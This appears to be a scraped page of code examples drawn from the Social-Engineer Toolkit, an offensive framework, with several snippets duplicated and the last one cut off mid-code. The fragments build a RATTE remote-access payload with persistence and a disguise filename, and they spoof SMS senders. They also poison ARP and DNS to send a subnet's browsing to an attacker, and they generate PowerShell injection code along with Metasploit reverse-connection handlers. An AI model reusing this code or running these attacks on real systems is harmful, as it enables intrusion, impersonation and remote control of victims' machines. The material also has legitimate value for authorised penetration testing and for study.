コード例 #1
0
def do_autopwn():
    print('Doing do_autopwn')
    # pull the metasploit database
    database = core.meta_database()
    ip_range = input(core.setprompt(["19", "20"], "Enter the IP ranges to attack (nmap syntax only)"))

    # prep the answer file
    prep(database, ip_range)
    confirm_attack = input(core.setprompt(["19", "20"], "You are about to attack systems are you sure [y/n]"))

    # if we are sure, then lets do it
    if confirm_attack == "yes" or confirm_attack == "y":
        launch()
コード例 #2
0
def do_autopwn():
    print "Doing do_autopwn"
    # pull the metasploit database
    database = setcore.meta_database()
    range = raw_input(setcore.setprompt(["19", "20"], "Enter the IP ranges to attack (nmap syntax only)"))

    # prep the answer file
    prep(database, range)
    confirm_attack = raw_input(setcore.setprompt(["19", "20"], "You are about to attack systems are you sure [y/n]"))

    # if we are sure, then lets do it
    if confirm_attack == "yes" or confirm_attack == "y":
        launch()
コード例 #3
0
def _do_sms():
    print("""\n        ----- The Social-Engineer Toolkit (SET) SMS Spoofing Attack Vector -----\n""")
    print("This attack vector relies upon a third party service called www.spoofmytextmessage.com. "
          "This is a third party service outside of the control from the Social-Engineer Toolkit. "
          "The fine folks over at spoofmytextmessage.com have provided an undocumented API for us "
          "to use in order to allow SET to perform the SMS spoofing. You will need to visit "
          "https://www.spoofmytextmessage.com and sign up for an account. They example multiple "
          "payment methods such as PayPal, Bitcoin, and many more options. Once you purchase your "
          "plan that you want, you will need to remember your email address and password used for "
          "the account. SET will then handle the rest.\n")

    print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
    print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding "
          "spoofmytextmessage.com\n")

    core.print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
                     "services from spoofmytextmessage.com and you are fully aware of your countries "
                     "legal stance on SMS spoofing prior to performing any of these. By accepting yes "
                     "you fully acknowledge these terms and will not use them for unlawful purposes.")

    message = input("\nDo you accept these terms (yes or no): ")

    if message == "yes":
        core.print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
        email = input(core.setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
        core.print_status("Note that the password below will be masked and you will not see the output.")
        pw = getpass.getpass(core.setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
        core.print_status("The next section requires a country code, this is the code you would use to dial "
                          "to the specific country, for example if I was sending a message to 555-555-5555 to "
                          "the United States (or from) you would enter +1 below.")

        tocountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending TO "
                                                "(for example U.S would be '+1')[+1]"))
        if tocountry == "":
            tocountry = "+1"

        fromcountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending FROM "
                                              "(for example U.S. would be '+1')[+1]"))
        if fromcountry == "":
            fromcountry = "+1"

        tonumber = input(core.setprompt(["7"], "Enter the number to send the SMS TO - be sure to include "
                                           "country code (example: +15551234567)"))

        fromnumber = input(core.setprompt(["7"], "Enter the number you want to come FROM - be sure to include "
                                             "country code (example: +15551234567)"))

        message = input(core.setprompt(["7"], "Enter the message you want to send via the text message"))

        # note that the function for this is in a compiled python file with no source -
        # this was done at the request of the third party we use since the API is not documented.
        # I hand wrote the code and can validate its authenticity - it imports python requests
        # and json and uses that to interact with the API. From a security standpoint if you are
        # uncomfortable using this - feel free to ping me and I can walk you through what I do
        # without giving away the API from the third party.
        from src.sms.protectedapi import send_sms
        send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message)

    else:
        core.print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")
コード例 #4
0
def _do_sms():
    print("""\n        ----- The Social-Engineer Toolkit (SET) SMS Spoofing Attack Vector -----\n""")
    print("This attack vector relies upon a third party service called www.spoofmytextmessage.com. "
          "This is a third party service outside of the control from the Social-Engineer Toolkit. "
          "The fine folks over at spoofmytextmessage.com have provided an undocumented API for us "
          "to use in order to allow SET to perform the SMS spoofing. You will need to visit "
          "https://www.spoofmytextmessage.com and sign up for an account. They example multiple "
          "payment methods such as PayPal, Bitcoin, and many more options. Once you purchase your "
          "plan that you want, you will need to remember your email address and password used for "
          "the account. SET will then handle the rest.\n")

    print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
    print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding "
          "spoofmytextmessage.com\n")

    core.print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
                     "services from spoofmytextmessage.com and you are fully aware of your countries "
                     "legal stance on SMS spoofing prior to performing any of these. By accepting yes "
                     "you fully acknowledge these terms and will not use them for unlawful purposes.")

    message = input("\nDo you accept these terms (yes or no): ")

    if message == "yes":
        core.print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
        email = input(core.setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
        core.print_status("Note that the password below will be masked and you will not see the output.")
        pw = getpass.getpass(core.setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
        core.print_status("The next section requires a country code, this is the code you would use to dial "
                          "to the specific country, for example if I was sending a message to 555-555-5555 to "
                          "the United States (or from) you would enter +1 below.")

        tocountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending TO "
                                                "(for example U.S would be '+1')[+1]"))
        if tocountry == "":
            tocountry = "+1"

        fromcountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending FROM "
                                              "(for example U.S. would be '+1')[+1]"))
        if fromcountry == "":
            fromcountry = "+1"

        tonumber = input(core.setprompt(["7"], "Enter the number to send the SMS TO - be sure to include "
                                           "country code (example: +15551234567)"))

        fromnumber = input(core.setprompt(["7"], "Enter the number you want to come FROM - be sure to include "
                                             "country code (example: +15551234567)"))

        message = input(core.setprompt(["7"], "Enter the message you want to send via the text message"))

        # note that the function for this is in a compiled python file with no source -
        # this was done at the request of the third party we use since the API is not documented.
        # I hand wrote the code and can validate its authenticity - it imports python requests
        # and json and uses that to interact with the API. From a security standpoint if you are
        # uncomfortable using this - feel free to ping me and I can walk you through what I do
        # without giving away the API from the third party.
        from src.sms.protectedapi import send_sms
        send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message)

    else:
        core.print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")
コード例 #5
0
def main():

    ############
    # get User Input
    ############
    ipaddr = raw_input(
        core.setprompt(["9", "2"], "IP address to connect back on"))
    try:
        ratteport = int(
            raw_input(
                core.setprompt(["9", "2"],
                               "Port RATTE Server should listen on")))
        while ratteport == 0 or ratteport > 65535:
            core.PrintWarning('Port must not be equal to javaport!')
            ratteport = int(
                raw_input(
                    core.setprompt(
                        ["9", "2"],
                        "Enter port RATTE Server should listen on")))
    except ValueError:
        ratteport = 8080

    persistent = raw_input(
        core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
    if persistent == "no" or persistent == "" or persistent == "n":
        persistent = "NO"
    else:
        persistent = "YES"

    customexe = raw_input(
        core.setprompt([
            "9", "2"
        ], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    core.PrintStatus(
        "Payload has been exported to src/program_junk/ratteM.exe")

    ############
    # start ratteserver
    ############
    prompt = raw_input(
        core.setprompt(["9", "2"],
                       "Start the ratteserver listener now [yes|no]"))
    if prompt == "yes" or prompt == "" or prompt == "y":
        core.PrintInfo("Starting ratteserver...")
        ratte_listener_start(ratteport)
コード例 #6
0
ファイル: ratte_only_module.py プロジェクト: BrzTit/SET
def main():
	
	############
	# get User Input
	############
	ipaddr=raw_input(core.setprompt(["9", "2"], "IP address to connect back on"))
	try:
		ratteport=int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on")))
		while ratteport==0 or ratteport > 65535:
			core.PrintWarning('Port must not be equal to javaport!')
			ratteport=int(raw_input(core.setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
	except ValueError:
		ratteport=8080
	
	persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
	if persistent == "no" or persistent == "" or persistent == "n":
		persistent="NO"
	else:
		persistent="YES"
		
	customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

	############
	# prepare RATTE
	############
	prepare_ratte(ipaddr,ratteport,persistent,customexe)

	core.PrintStatus("Payload has been exported to src/program_junk/ratteM.exe")
	
	############
	# start ratteserver 
	############
	prompt=raw_input(core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
	if prompt == "yes" or prompt == "" or prompt == "y":
		core.PrintInfo("Starting ratteserver...")
		ratte_listener_start(ratteport)
コード例 #7
0
#!/usr/bin/env python
import random
from src.core import setcore as core

try:
	print ("\n         [****]  Custom Template Generator [****]\n") 
	print ("\n   Always looking for new templates! In the set/src/templates directory send an email\nto [email protected] if you got a good template!")
	author=raw_input(core.setprompt("0", "Name of the author"))
	filename=randomgen=random.randrange(1,99999999999999999999)
	filename=str(filename)+(".template")
	subject=raw_input(core.setprompt("0", "Email Subject"))
	try:
		body=raw_input(core.setprompt("0", "Message Body, hit return for a new line. Control+c when you are finished"))
		while body != 'sdfsdfihdsfsodhdsofh':
			try:
				body+=(r"\n")
				body+=raw_input("Next line of the body: ")
			except KeyboardInterrupt: break
	except KeyboardInterrupt: pass
	filewrite=file("src/templates/%s" % (filename), "w")
	filewrite.write("# Author: "+author+"\n#\n#\n#\n")
	filewrite.write('SUBJECT='+'"'+subject+'"\n\n')
	filewrite.write('BODY='+'"'+body+'"\n')
	print "\n"
	filewrite.close()
except Exception, e:
	print "   An error occured, printing error message: "+str(e)
コード例 #8
0
# coding=utf-8

import subprocess
import src.core.setcore as core

#
# Simple python script to kill things created by the SET wifi attack vector
#

try:
    input = raw_input
except:
    pass

interface = input(
    core.setprompt(["8"], "Enter your wireless interface (ex: wlan0): "))

# fix a bug if present
core.print_status(
    "Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this."
)
subprocess.Popen("rmmod rtl8187;"
                 "rfkill block all;"
                 "rfkill unblock all;"
                 "modprobe rtl8187;"
                 "rfkill unblock all;"
                 "ifconfig {0} up".format(interface),
                 shell=True).wait()

core.print_status("Killing airbase-ng...")
subprocess.Popen("killall airbase-ng", shell=True).wait()
コード例 #9
0
ファイル: module_handler.py プロジェクト: BrzTit/SET
for name in glob.glob("modules/*.py"):
    
    counter = counter + 1
    fileopen = file(name, "r")
    
    for line in fileopen:
        line = line.rstrip()
        match = re.search("MAIN=", line)
        if match:
            line = line.replace('MAIN="', "")
            line = line.replace('"', "")
            line = "  " + str(counter) + ". " + line
            print line

print "\n  99. Return to the previous menu\n" 
choice = raw_input(setcore.setprompt(["9"], ""))

if choice == 'exit':
    setcore.ExitSet()

if choice == '99':
    menu_return = "true"

# throw error if not integer
try: 
    choice = int(choice)
except: 
    setcore.PrintWarning("An integer was not used try again")
    choice = raw_input(setcore.setprompt(["9"], ""))

# start a new counter to match choice
コード例 #10
0
        ipaddr=line
    if ettercapchoice == 'y':
        try:
            print """
  This attack will poison all victims on your local subnet, and redirect them
  when they hit a specific website. The next prompt will ask you which site you
  will want to trigger the DNS redirect on. A simple example of this is if you
  wanted to trigger everyone on your subnet to connect to you when they go to
  browse to www.google.com, the victim would then be redirected to your malicious
  site. You can alternatively poison everyone and everysite by using the wildcard 
  '*' flag.

  IF YOU WANT TO POISON ALL DNS ENTRIES (DEFAULT) JUST HIT ENTER OR *
"""
            setcore.print_info("Example: http://www.google.com")
            dns_spoof=raw_input(setcore.setprompt("0", "Site to redirect to attack machine [*]"))
            os.chdir(path)
            # small fix for default
            if dns_spoof == "":
                # set default to * (everything)
                dns_spoof="*"
            # remove old stale files
            subprocess.Popen("rm etter.dns 1> /dev/null 2> /dev/null", shell=True).wait()
            # prep etter.dns for writing
            filewrite=file("etter.dns", "w")
            # send our information to etter.dns
            filewrite.write("%s A %s" % (dns_spoof,ipaddr))
            # close the file
            filewrite.close()
            # set bridge variable to nothing
            bridge=""
コード例 #11
0
straight into memory and the stager created and shot back to you.
""")

# if we dont detect metasploit
if not os.path.isfile(msf_path):
    sys.exit(
        "\n[!] Your no gangster... Metasploit not detected, check set_config.\n"
    )

# if we hit here we are good since msfvenom is installed
###################################################
#        USER INPUT: SHOW PAYLOAD MENU 2          #
###################################################

show_payload_menu2 = core.create_menu(payload_menu_2_text, payload_menu_2)
payload = (input(core.setprompt(["14"], "")))

if payload == "exit":
    core.exit_set()

# if its default then select meterpreter
if payload == "":
    payload = "2"

# assign the right payload
payload = ms_payload(payload)

# if we're downloading and executing a file
url = ""
port = ""
if payload == "windows/download_exec":
コード例 #12
0
# make directory if it's not there
if not os.path.isdir("src/program_junk/web_clone/"):
        os.makedirs("src/program_junk/web_clone/")

# grab ip address and SET web server interface
if os.path.isfile("src/program_junk/interface"):
        fileopen = file("src/program_junk/interface", "r")
        for line in fileopen:
                ipaddr = line.rstrip()
        if os.path.isfile("src/program_junk/ipaddr.file"):
                        fileopen = file ("src/program_junk/ipaddr.file", "r")
                        for line in fileopen:
                                webserver = line.rstrip()

        if not os.path.isfile("src/program_junk/ipaddr.file"):
                ipaddr = raw_input(setcore.setprompt("0", "IP address to connect back on for the reverse listener"))

else:
        if os.path.isfile("src/program_junk/ipaddr.file"):
                fileopen = file("src/program_junk/ipaddr.file", "r")
                for line in fileopen:
                        ipaddr = line.rstrip()
                webserver = ipaddr

# grab port options from payloadgen.py
if os.path.isfile("src/program_junk/port.options"):
        fileopen = file("src/program_junk/port.options", "r")
        for line in fileopen: 
                port = line.rstrip()
else:
        port = raw_input(setcore.setprompt("0", "Port you want to use for the connection back"))
コード例 #13
0
def prep_powershell_payload():

    # grab stage encoding flag
    stage_encoding = core.check_config("STAGE_ENCODING=").lower()
    if stage_encoding == "off":
        stage_encoding = "false"
    else:
        stage_encoding = "true"

    # check to see if we are just generating powershell code
    powershell_solo = core.check_options("POWERSHELL_SOLO")

    # check if port is there
    port = core.check_options("PORT=")

    # check if we are using auto_migrate
    auto_migrate = core.check_config("AUTO_MIGRATE=")

    # check if we are using pyinjection
    pyinjection = core.check_options("PYINJECTION=")
    if pyinjection == "ON":
        # check to ensure that the payload options were specified right
        if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")):
            pyinjection = "on"
            core.print_status("Multi/Pyinjection was specified. Overriding config options.")
        else:
            pyinjection = "off"

    # grab ipaddress
    if core.check_options("IPADDR=") != 0:
        ipaddr = core.check_options("IPADDR=")
    else:
        ipaddr = input("Enter the ipaddress for the reverse connection: ")
        core.update_options("IPADDR=" + ipaddr)

    # check to see if we are using multi powershell injection
    multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower()

    # turn off multi injection if pyinjection is specified
    if pyinjection == "on":
        multi_injection = "off"

    # check what payloads we are using
    powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=")

    # if we specified a hostname then default to reverse https/http
    if not core.validate_ip(ipaddr):
        powershell_inject_x86 = "windows/meterpreter/reverse_http"

    # prompt what port to listen on for powershell then make an append to the current
    # metasploit answer file
    if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
        # if we have multi injection on, don't worry about these
        if multi_injection != "on" and pyinjection == "off":
            core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
            port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
            if not port:
                port = "443"
            with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen:
                data = fileopen.read()
            match = re.search(port, data)
            if not match:
                with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
                    filewrite.write("\nuse exploit/multi/handler\n")
                    if auto_migrate == "ON":
                        filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
                    filewrite.write("set PAYLOAD {0}\n"
                                    "set LHOST {1}\n"
                                    "set LPORT {2}\n"
                                    "set EnableStageEncoding {3}\n"
                                    "set ExitOnSession false\n"
                                    "exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding))

    # if we have multi injection on, don't worry about these
    if multi_injection != "on" and pyinjection == "off":
        # check to see if the meta config multi pyinjector is there
        if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
            if core.check_options("PORT=") != 0:
                port = core.check_options("PORT=")
            # if port.options isnt there then prompt
            else:
                port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
                if not port:
                    port = "443"
                core.update_options("PORT={0}".format(port))

    # turn off multi_injection if we are riding solo from the powershell menu
    if powershell_solo == "ON":
        multi_injection = "off"
        pyinjection = "on"

    # if we are using multi powershell injection
    if multi_injection == "on" and pyinjection == "off":
        core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")

    # define a base variable
    x86 = ""

    # specify a list we will use for later
    multi_injection_x86 = ""

    # here we do some funky loops so we don't need to rewrite the code below
    if multi_injection == "on":
        port = core.check_config("POWERSHELL_MULTI_PORTS=")
        port = port.split(",")

    if multi_injection == "on":
        # iterate through the ports, used for POWERSHELL_MULTI_PORTS
        for ports in port:
            # dont cycle through if theres a blank
            if ports:
                core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports))
                multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86)

                if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
                    port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports)
                    if not port_check:
                        with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
                            filewrite.write("\nuse exploit/multi/handler\n")
                            if auto_migrate == "ON":
                                filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
                            filewrite.write("set PAYLOAD {0}\n"
                                            "set LHOST {1}\n"
                                            "set EnableStageEncoding {2}\n"
                                            "set LPORT {3}\n"
                                            "set ExitOnSession false\n"
                                            "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))

                # if we aren't using multi pyinjector
                if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
                    # if meta config isn't created yet then create it
                    if not os.path.isfile():
                        with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite:
                            filewrite.write("")
                    port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports)
                    if not port_check:
                        with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite:
                            filewrite.write("\nuse exploit/multi/handler\n")
                            if auto_migrate == "ON":
                                filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
                            filewrite.write("set PAYLOAD {0}\n"
                                            "set LHOST {1}\n"
                                            "set EnableStageEncoding {2}\n"
                                            "set ExitOnSession false\n"
                                            "set LPORT {3}\n"
                                            "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))

    # here we do everything if pyinjection or multi pyinjection was specified
    if pyinjection == "on":
        injections = []
        # read in the file we need for parsing
        with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen:
            payloads = fileopen.read()[:-1].rstrip()  # strips an extra ,
        payloads = payloads.split(",")
        # format: payload<space>port
        for payload in payloads:
            # format: payload<space>port
            payload = payload.split(" ")
            powershell_inject_x86 = payload[0]
            port = payload[1]
            core.print_status("Generating x86-based powershell injection code...")
            injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86))
        multi_injection_x86 = ",".join(injections)

    # if its turned to off
    if multi_injection == "off" and pyinjection == "off":
        core.print_status("Generating x86-based powershell injection code...")
        x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)

    # if we are specifying multi powershell injection
    if multi_injection == "on" or pyinjection == "on":
        x86 = multi_injection_x86[1:]  # remove comma at beginning

    # check to see if we want to display the powershell command to the user
    verbose = core.check_config("POWERSHELL_VERBOSE=")
    if verbose.lower() == "on":
        core.print_status("Printing the x86 based encoded code...")
        time.sleep(3)
        print(x86)

    with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite:
        filewrite.write(x86)
    core.print_status("Finished generating powershell injection bypass.")
    core.print_status("Encoded to bypass execution restriction policy...")
コード例 #14
0
#!/usr/bin/env python
import random
from src.core import setcore as core

try:
    print("\n         [****]  Custom Template Generator [****]\n")
    author = raw_input(core.setprompt(["7"], "Name of the author"))
    filename = randomgen = random.randrange(1, 99999999999999999999)
    filename = str(filename) + (".template")
    origin = raw_input(core.setprompt(["7"], "Source phone # of the template"))
    subject = raw_input(core.setprompt(["7"], "Subject of the template"))
    body = raw_input(core.setprompt(["7"], "Body of the message"))
    filewrite = file("src/templates/sms/%s" % (filename), "w")
    filewrite.write("# Author: " + author + "\n#\n#\n#\n")
    filewrite.write('ORIGIN=' + '"' + origin + '"\n\n')
    filewrite.write('SUBJECT=' + '"' + subject + '"\n\n')
    filewrite.write('BODY=' + '"' + body + '"\n')
    print "\n"
    filewrite.close()
except Exception, e:
    core.PrintError("An error occured:")
    core.PrintError("ERROR:" + str(e))
コード例 #15
0
def main():
    valid_site = False
    valid_ip = False
    valid_response = False
    input_counter = 0

    #################
    # get User Input
    #################
    # ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
    while valid_ip != True and input_counter < 3:
        ipaddr = input(
            core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error(
                    "\nМожет быть, вы неправильно написали адрес?")
                sleep(4)
                return
            else:
                input_counter += 1

    # try:
    #         ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
    #         while ratteport==0 or ratteport > 65535:
    #                 print_warning('Port must not be equal to javaport!')
    #                 ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
    # except ValueError:
    #         ratteport=8080

    try:
        ratteport = int(
            input(
                core.setprompt(
                    ["9", "2"],
                    "Порт RATTE Server должен прослушивать [8080]")))
        while ratteport == 0 or ratteport > 65535:
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(
                input(
                    core.setprompt(
                        ["9", "2"],
                        "Введите порт RATTE Сервер должен прослушивать [8080]")
                ))
    except ValueError:
        # core.print_info("Port set to default of 8080")
        ratteport = 8080

    # persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
    # if persistent == 'no' or persistent == '' or persistent == 'n':
    #         persistent='NO'
    # else:
    #         persistent='YES'

    while not valid_response:
        persistent = input(
            core.setprompt(["9", "2"],
                           "Должен ли RATTE быть постоянным [no|yes]?"))
        persistent = str.lower(persistent)
        if persistent == "no" or persistent == "n":
            persistent = "NO"
            valid_response = True
        elif persistent == "yes" or persistent == "y":
            persistent = "YES"
            valid_response = True
        else:
            core.print_warning(text.YES_NO_RESPONSES)

    valid_response = False

    customexe = input(
        core.setprompt([
            "9", "2"
        ], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]?"
                       ))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    core.print_status("Полезная нагрузка была экспортирована в %s" %
                      os.path.join(core.userconfigpath, "ratteM.exe"))

    ###################
    # start ratteserver
    ###################
    # prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
    # if prompt == "yes" or prompt == "" or prompt == "y":
    #         print_info("Starting ratteserver...")
    #         ratte_listener_start(ratteport)

    while not valid_response:
        prompt = input(
            core.setprompt(["9", "2"],
                           "Запустите слушатель ratteserver сейчас [yes|no]"))
        prompt = str.lower(prompt)
        if prompt == "no" or prompt == "n":
            # prompt = "NO"
            core.print_error("Aborting...")
            sleep(2)
            valid_response = True
        elif prompt == "yes" or prompt == "y":
            core.print_info("Старт ратсервер...")
            ratte_listener_start(ratteport)
            core.print_info("Остановка ратсервера...")
            sleep(2)
            valid_response = True
        else:
            core.print_warning(
                "действительные ответы 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
コード例 #16
0
ファイル: template.py プロジェクト: obiwan111/SET
#!/usr/bin/env python
import subprocess, os
from src.core import setcore as core
#
# used for pre-defined templates
#
print """
  1. Java Required 
  2. Gmail
  3. Google
  4. Facebook
  5. Twitter
"""
choice = raw_input(core.setprompt(["2"], "Select a template"))

if choice == "exit":
    core.ExitSet()

# file used for nextpage in java applet attack
filewrite = file("src/program_junk/site.template", "w")

# if nothing is selected
if choice == "": choice = "1"

# if java required
if choice == "1":
    subprocess.Popen(
        "cp src/html/templates/java/index.template src/html/ 1> /dev/null 2> /dev/null",
        shell=True).wait()
    URL = ""
コード例 #17
0
ファイル: solo.py プロジェクト: BrzTit/SET
import subprocess
import os
import re
import sys
from src.core import setcore

# definepath
definepath=os.getcwd()
sys.path.append(definepath)


meta_path = setcore.meta_path()

# launch msf listener
setcore.PrintInfo("The payload can be found in the SET home directory.")
choice = raw_input(setcore.setprompt("0", "Start the listener now? [yes|no]"))
if choice == "yes" or choice == "y":

    # if we didn't select the SET interactive shell as our payload
    if not os.path.isfile("src/program_junk/set.payload"):
        setcore.PrintInfo("Please wait while the Metasploit listener is loaded...")
        subprocess.Popen("ruby %s/msfconsole -L -n -r src/program_junk/meta_config" % (meta_path), shell=True).wait()

    # if we did select the set payload as our option
    if os.path.isfile("src/program_junk/set.payload"):
        fileopen = file("src/program_junk/port.options", "r")
        set_payload = file("src/program_junk/set.payload", "r")
        port = fileopen.read().rstrip()
        set_payload = set_payload.read().rstrip()
        if set_payload == "SETSHELL":
            setcore.PrintInfo("Starting the SET Interactive Shell Listener on %s." % (port))
コード例 #18
0
ファイル: set.py プロジェクト: obiwan111/SET
sys.path.append("../")
try:
   while 1:
     setcore.show_banner(define_version,'1')
     
    ###################################################
    #        USER INPUT: SHOW MAIN MENU               #
    ###################################################   

     show_main_menu = setcore.CreateMenu(text.main_text, text.main)
    
     # special case of list item 99
     print '\n  99) Return back to the main menu.\n'
     
     main_menu_choice = (raw_input(setcore.setprompt("0", "")))
     
     if main_menu_choice == 'exit':
		break         

     if main_menu_choice == '1': #'Spearphishing Attack Vectors
      while 1:
   
       ###################################################
       #        USER INPUT: SHOW SPEARPHISH MENU         #
       ###################################################   

       show_spearphish_menu = setcore.CreateMenu(text.spearphish_text, text.spearphish_menu)
       spearphish_menu_choice = raw_input(setcore.setprompt(["1"], ""))
       
       if spearphish_menu_choice == 'exit':
コード例 #19
0
ファイル: arp_cache.py プロジェクト: obiwan111/SET
    if ettercapchoice == 'y':
        try:
            print """
  This attack will poison all victims on your local subnet, and redirect them
  when they hit a specific website. The next prompt will ask you which site you
  will want to trigger the DNS redirect on. A simple example of this is if you
  wanted to trigger everyone on your subnet to connect to you when they go to
  browse to www.google.com, the victim would then be redirected to your malicious
  site. You can alternatively poison everyone and everysite by using the wildcard 
  '*' flag.

  IF YOU WANT TO POISON ALL DNS ENTRIES (DEFAULT) JUST HIT ENTER OR *
"""
            setcore.PrintInfo("Example: http://www.google.com")
            dns_spoof = raw_input(
                setcore.setprompt("0",
                                  "Site to redirect to attack machine [*]"))
            os.chdir(path)
            # small fix for default
            if dns_spoof == "":
                # set default to * (everything)
                dns_spoof = "*"
            # remove old stale files
            subprocess.Popen("rm etter.dns 1> /dev/null 2> /dev/null",
                             shell=True).wait()
            # prep etter.dns for writing
            filewrite = file("etter.dns", "w")
            # send our information to etter.dns
            filewrite.write("%s A %s" % (dns_spoof, ipaddr))
            # close the file
            filewrite.close()
            # set bridge variable to nothing
コード例 #20
0
if not os.path.isdir("src/program_junk/web_clone/"):
    os.makedirs("src/program_junk/web_clone/")

# grab ip address and SET web server interface
if os.path.isfile("src/program_junk/interface"):
    fileopen = file("src/program_junk/interface", "r")
    for line in fileopen:
        ipaddr = line.rstrip()
    if os.path.isfile("src/program_junk/ipaddr.file"):
        fileopen = file("src/program_junk/ipaddr.file", "r")
        for line in fileopen:
            webserver = line.rstrip()

    if not os.path.isfile("src/program_junk/ipaddr.file"):
        ipaddr = raw_input(
            setcore.setprompt(
                "0", "IP address to connect back on for the reverse listener"))

else:
    if os.path.isfile("src/program_junk/ipaddr.file"):
        fileopen = file("src/program_junk/ipaddr.file", "r")
        for line in fileopen:
            ipaddr = line.rstrip()
        webserver = ipaddr

# grab port options from payloadgen.py
if os.path.isfile("src/program_junk/port.options"):
    fileopen = file("src/program_junk/port.options", "r")
    for line in fileopen:
        port = line.rstrip()
else:
    port = raw_input(
コード例 #21
0
def main():
    valid_site = False
    valid_ip = False
    valid_response = False
    input_counter = 0

    #################
    # get User Input
    #################
    # ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
    while valid_ip != True and input_counter < 3:
        ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error("\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            else:
                input_counter += 1

    # try:
    #         ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
    #         while ratteport==0 or ratteport > 65535:
    #                 print_warning('Port must not be equal to javaport!')
    #                 ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
    # except ValueError:
    #         ratteport=8080

    try:
        ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
        while ratteport == 0 or ratteport > 65535:
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(input(core.setprompt(["9", "2"], "Enter port RATTE Server should listen on [8080]")))
    except ValueError:
        # core.print_info("Port set to default of 8080")
        ratteport = 8080

    # persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
    # if persistent == 'no' or persistent == '' or persistent == 'n':
